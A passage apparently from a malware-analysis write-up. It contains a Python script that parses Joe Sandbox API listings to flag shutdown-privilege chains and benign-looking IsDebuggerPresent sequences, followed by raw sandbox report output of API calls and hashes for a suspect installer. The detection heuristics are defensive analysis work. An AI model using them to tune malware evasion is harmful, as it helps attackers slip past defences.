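• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6CA64BCB
• NtInitiatePowerAction.NTDLL ref: 6CA64BDF
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CA6F099
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CA6F0A3
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CA6F0B0
  • Part of subcall function 6CA68199: RaiseException.KERNEL32(E06D7363,00000001), ref: 6CA681F9
"""

# One "• Api.MODULE(args), ref: ADDR" line; args and the comma are optional.
API_LINE = re.compile(
    r"^\s*•\s*(?P<api>[A-Za-z0-9_:]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Token access rights as defined in winnt.h (assumed constants, not from the report).
TOKEN_ACCESS = {
    0x0001: "TOKEN_ASSIGN_PRIMARY", 0x0002: "TOKEN_DUPLICATE",
    0x0004: "TOKEN_IMPERSONATE", 0x0008: "TOKEN_QUERY",
    0x0010: "TOKEN_QUERY_SOURCE", 0x0020: "TOKEN_ADJUST_PRIVILEGES",
    0x0040: "TOKEN_ADJUST_GROUPS", 0x0080: "TOKEN_ADJUST_DEFAULT",
    0x0100: "TOKEN_ADJUST_SESSIONID",
}

# APIs that act on an enabled privilege (example's own choice of "sinks").
SHUTDOWN_SINKS = {"NtInitiatePowerAction", "NtShutdownSystem", "ExitWindowsEx",
                  "InitiateSystemShutdownW", "InitiateSystemShutdownExW", "InitiateShutdownW"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list   # int for 8-digit hex literals, "?" when unknown, str otherwise
    ref: int     # address of the call site


def parse_args(raw):
    """Turn '00000000,SeShutdownPrivilege,?' into [0, 'SeShutdownPrivilege', '?']."""
    if not raw:
        return []
    out = []
    for a in (s.strip() for s in raw.split(",")):
        if a == "?":
            out.append("?")
        elif re.fullmatch(r"[0-9A-Fa-f]{8}", a):
            out.append(int(a, 16))
        else:
            out.append(a)
    return out


def parse_listing(text):
    """Parse every top-level API line; nested subcall lines and headers are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            calls.append(ApiCall(m["api"], m["module"], parse_args(m["args"]), int(m["ref"], 16)))
    return calls


def decode_token_access(mask):
    """Expand a DesiredAccess mask into TOKEN_* names; unknown bits are kept as hex."""
    names = [name for bit, name in sorted(TOKEN_ACCESS.items()) if mask & bit]
    leftover = mask & ~sum(TOKEN_ACCESS)
    if leftover:
        names.append(hex(leftover))
    return names


def find_privilege_chains(calls):
    """Return (privilege, sink_api, sink_ref) for each chain of: OpenProcessToken with
    TOKEN_ADJUST_PRIVILEGES, LookupPrivilegeValue* by name, AdjustTokenPrivileges with
    DisableAllPrivileges == 0, then a call to a shutdown-capable sink API."""
    findings, opened, privs = [], False, []
    for c in calls:
        if c.api == "OpenProcessToken" and len(c.args) >= 2 and isinstance(c.args[1], int):
            opened = "TOKEN_ADJUST_PRIVILEGES" in decode_token_access(c.args[1])
            privs = []
        elif c.api.startswith("LookupPrivilegeValue") and len(c.args) >= 2 \
                and isinstance(c.args[1], str) and c.args[1] != "?":
            privs.append(c.args[1])
        elif c.api == "AdjustTokenPrivileges":
            # args[1] is DisableAllPrivileges; 0 means the NewState we pass is applied
            if not (opened and privs and len(c.args) >= 2 and c.args[1] == 0):
                opened, privs = False, []
        elif c.api in SHUTDOWN_SINKS and opened and privs:
            findings.extend((p, c.api, c.ref) for p in privs)
            opened, privs = False, []
    return findings


def crt_security_failure_refs(calls):
    """Call sites where IsDebuggerPresent is directly followed by
    SetUnhandledExceptionFilter(NULL) and UnhandledExceptionFilter: the CRT's
    fault-reporting pattern rather than a purposeful anti-debug check."""
    refs = []
    for a, b, c in zip(calls, calls[1:], calls[2:]):
        if (a.api == "IsDebuggerPresent" and b.api == "SetUnhandledExceptionFilter"
                and b.args[:1] == [0] and c.api == "UnhandledExceptionFilter"):
            refs.append(a.ref)
    return refs


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE_LISTING)
    for priv, sink, ref in find_privilege_chains(parsed):
        print(f"{priv} enabled and consumed by {sink} at {ref:08X}")
    for ref in crt_security_failure_refs(parsed):
        print(f"CRT-style IsDebuggerPresent sequence at {ref:08X} (likely not anti-debug)")
```

Run as a script it reports the SeShutdownPrivilege chain ending at 6CA64BDF and the CRT-style sequence at 6CA6F099; pointing `parse_listing` at the full "APIs" text of a report applies the same checks to every function.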
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: \j`7$\j`7$j
                        • API String ID: 0-3644614255
                        • Opcode ID: 90b3a30ccc174e086eb2e0af6a0c546ec75f3522ad3d7f4022945a44fd2bd0db
                        • Instruction ID: 7c14aa8081186cd841be6d958001721d9751c7c3176c526c33ac139725a0bdbd
                        • Opcode Fuzzy Hash: 90b3a30ccc174e086eb2e0af6a0c546ec75f3522ad3d7f4022945a44fd2bd0db
                        • Instruction Fuzzy Hash: BB4223746093828FCB24CF68C58066ABBE1BBCA354F544E2EE499C7762D334E845CB53
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: _strlen
                        • String ID:
                        • API String ID: 4218353326-0
                        • Opcode ID: 9ae11a6b9a9182133928ba27a4ed9faace215a4f2d62e0406d2d7875d6a804b7
                        • Instruction ID: 50ae1c84ed9633594297d88f8320e8bbc26fc912c67457c47a041a7623744473
                        • Opcode Fuzzy Hash: 9ae11a6b9a9182133928ba27a4ed9faace215a4f2d62e0406d2d7875d6a804b7
                        • Instruction Fuzzy Hash: 0153F271645B018FC728CF2AC8D0AA5B7F2EF9531871D8A2DC1D68BE55E774B48ACB40
                        APIs
                        • __EH_prolog.LIBCMT ref: 6CAC4CE5
                          • Part of subcall function 6CA9AC2A: __EH_prolog.LIBCMT ref: 6CA9AC2F
                          • Part of subcall function 6CA9C6A6: __EH_prolog.LIBCMT ref: 6CA9C6AB
                          • Part of subcall function 6CAC4A0E: __EH_prolog.LIBCMT ref: 6CAC4A13
                          • Part of subcall function 6CAC4837: __EH_prolog.LIBCMT ref: 6CAC483C
                          • Part of subcall function 6CAC8143: __EH_prolog.LIBCMT ref: 6CAC8148
                          • Part of subcall function 6CAC8143: ctype.LIBCPMT ref: 6CAC816C
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog$ctype
                        • String ID:
                        • API String ID: 1039218491-3916222277
                        • Opcode ID: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                        • Instruction ID: c72c133aa9a6ca707469040f55159946dad10245c5362a39caabf17d013d5265
                        • Opcode Fuzzy Hash: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                        • Instruction Fuzzy Hash: 3203AD30905258DEDF15CFA4CA84BECBBB0AF15308F24409AE449A7791DB746BCDDB62
                        APIs
                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CA6F099
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CA6F0A3
                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CA6F0B0
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                        • String ID:
                        • API String ID: 3906539128-0
                        • Opcode ID: 64b9ab817974acdb6b7837c83439c945fd9cc020e8708c015a1c4a2cb16fb492
                        • Instruction ID: 3acd60883916d0fc480d1d585ee702e08726217c792509be52c780ed230f3677
                        • Opcode Fuzzy Hash: 64b9ab817974acdb6b7837c83439c945fd9cc020e8708c015a1c4a2cb16fb492
                        • Instruction Fuzzy Hash: 6831C2749512289BCB21DF69DD887CDBBB8BF08314F5042EAE41CA7690EB749BC58F44
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,?,6CA6E055,6CA68A69,00000003,00000000,6CA68A69,00000000), ref: 6CA6DFBF
                        • TerminateProcess.KERNEL32(00000000,?,6CA6E055,6CA68A69,00000003,00000000,6CA68A69,00000000), ref: 6CA6DFC6
                        • ExitProcess.KERNEL32 ref: 6CA6DFD8
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: Process$CurrentExitTerminate
                        • String ID:
                        • API String ID: 1703294689-0
                        • Opcode ID: c4802848eed981fd0f1038ce9e84b409744950355b2a32d8adeef938217f46f5
                        • Instruction ID: 47e0bc3d156d81423c7282a204dc6fbad28997db4a8db39e5b56ceb526b5538c
                        • Opcode Fuzzy Hash: c4802848eed981fd0f1038ce9e84b409744950355b2a32d8adeef938217f46f5
                        • Instruction Fuzzy Hash: FCE04631515209ABCF022F55C90DA8A3F78FF8538AB248524F804CAA21CF35D9D6CA90
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: x=J
                        • API String ID: 3519838083-1497497802
                        • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                        • Instruction ID: 2e17bac14967af58970cefc939f20e5e0e5d137ca06770608b3298034104a13e
                        • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                        • Instruction Fuzzy Hash: D991C131D311199BCF05DFA8D992AEDB7F1AF0530CF24806AD452E7A61DB3159C9CBA0
                        APIs
                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6CA666D0
                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CA66EF3
                          • Part of subcall function 6CA68199: RaiseException.KERNEL32(E06D7363,00000001,00000003,6CA66EDC,00000000,?,?,?,6CA66EDC,?,6CA9354C), ref: 6CA681F9
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: ExceptionFeaturePresentProcessorRaisestd::invalid_argument::invalid_argument
                        • String ID:
                        • API String ID: 915016180-0
                        • Opcode ID: cfc26f1f83205d77b7f67e7605fb57c26f3532850650e76c2e9842aef69f2e4b
                        • Instruction ID: 5528c1262cd9f6da546464d7bae4bc9aeb931d0209cc267e6f87abc2ea3b435d
                        • Opcode Fuzzy Hash: cfc26f1f83205d77b7f67e7605fb57c26f3532850650e76c2e9842aef69f2e4b
                        • Instruction Fuzzy Hash: 2AB1A0B5E112059FDB04CF66C4856ADBBF5FB49314F28822AE426E7B80D734D584CFA0
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: @4J$DsL
                        • API String ID: 0-2004129199
                        • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                        • Instruction ID: cc380541f0e89265e6def3bd3fecba2991c5126931a6096303db623752a4b0f8
                        • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                        • Instruction Fuzzy Hash: 082171377A49564BD74CCA28DC33EB926C0E745305B89627DE94BCB7D1DF5D8800C648
                        APIs
                        • __EH_prolog.LIBCMT ref: 6CAB340F
                          • Part of subcall function 6CAB4137: __EH_prolog.LIBCMT ref: 6CAB413C
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                        • Instruction ID: 217fdac09441ee1915ed85bdcfa655544bd439a27afa7cdfbdda0ed2c646fb8f
                        • Opcode Fuzzy Hash: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                        • Instruction Fuzzy Hash: CC625A71D02259CFDF15CFA4C990BEDBBB9BF08308F14415AE855AB680DB749A89CF90
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: YA1
                        • API String ID: 0-613462611
                        • Opcode ID: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                        • Instruction ID: 6372e35f2d18a8740bfed96540eeea184bdd0a72db7da5e067277cce2047ed81
                        • Opcode Fuzzy Hash: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                        • Instruction Fuzzy Hash: 7942AD717093818FC315DF28C49069ABFE2EFD9308F144A6DE8D68B752D771990ACB92
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: __aullrem
                        • String ID:
                        • API String ID: 3758378126-0
                        • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                        • Instruction ID: 31fc32a9032e40c672266a3517012798e04c60ed77c8bc8ca1c870806ed6c50e
                        • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                        • Instruction Fuzzy Hash: 6851F971A042559BD710CF5EC4C12EEFBF6EF79214F28C05EE8C897242D27A499AC760
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID: 0-3916222277
                        • Opcode ID: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                        • Instruction ID: 83bf7dc84b903d1e26d01cb44c4d8a35ed08d818d49d144c58b4fdafff41fe32
                        • Opcode Fuzzy Hash: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                        • Instruction Fuzzy Hash: FB027A3160C3808BD725CF29C59079FBBE2FBC8318F194A2EE48597B51C7769949CB82
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: (SL
                        • API String ID: 0-669240678
                        • Opcode ID: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                        • Instruction ID: bf15c6a6df0b6284ff46f33d4eefd7b520d388b87868b323f731374abd339749
                        • Opcode Fuzzy Hash: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                        • Instruction Fuzzy Hash: 01516473E208314AD78CCE24DC21B7672D2E784310F8BC1B99D4BAB6E6DD78989587D4
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                        • Instruction ID: 0161432c687acef76f0018efb1dd51d45861b52c3fffb2077ded92b5fa4d690d
                        • Opcode Fuzzy Hash: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                        • Instruction Fuzzy Hash: CE522E31708B858BD718CF29C59066ABBE2FB95308F148A2DD4DAC7B51DB74F849CB81
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                        • Instruction ID: 77f81d8778670ebb5246ed20f2afd12fd23f6d443f732f72a6821390030ca3a1
                        • Opcode Fuzzy Hash: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                        • Instruction Fuzzy Hash: B962F4B1A083858FC714CF1AC48056AFBE6FFC8744F248A2EE89997715D775E845CB82
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                        • Instruction ID: e207278383b88f62bf7fbcb8ad2e544d8327274476b06b6fad07aacf8f3faff3
                        • Opcode Fuzzy Hash: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                        • Instruction Fuzzy Hash: 8312CE712097818FC718CF28C59466EBBE2FF99344F584A2DE99687F41D731E849CB82
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                        • Instruction ID: 27d62876dc4c70b37343305f880db5366ea4592d94cbb1363930e9137bdee04f
                        • Opcode Fuzzy Hash: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                        • Instruction Fuzzy Hash: A9021B31A183518BD329CE28C484279BBF2FBC4365F150B2EE89AD7E54D7789845CB93
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                        • Instruction ID: c1c0cf1b9c9962521259fc0175aaa332fea3e29f4d386eea9aca179109d073b7
                        • Opcode Fuzzy Hash: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                        • Instruction Fuzzy Hash: C8F1E1327042C88BEB24CE68E4507EEBBE2FBC5314F544539D989CBB81DB35954AC792
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                        • Instruction ID: 06e70fa064f4ab26b10aee230a098d51e528262f9903ff1dd76ed9471221f46c
                        • Opcode Fuzzy Hash: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                        • Instruction Fuzzy Hash: F1D145715087928FD31ACF2CE494236BBE1FF86304F054ABDD9A68BB8AD734A505CB41
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
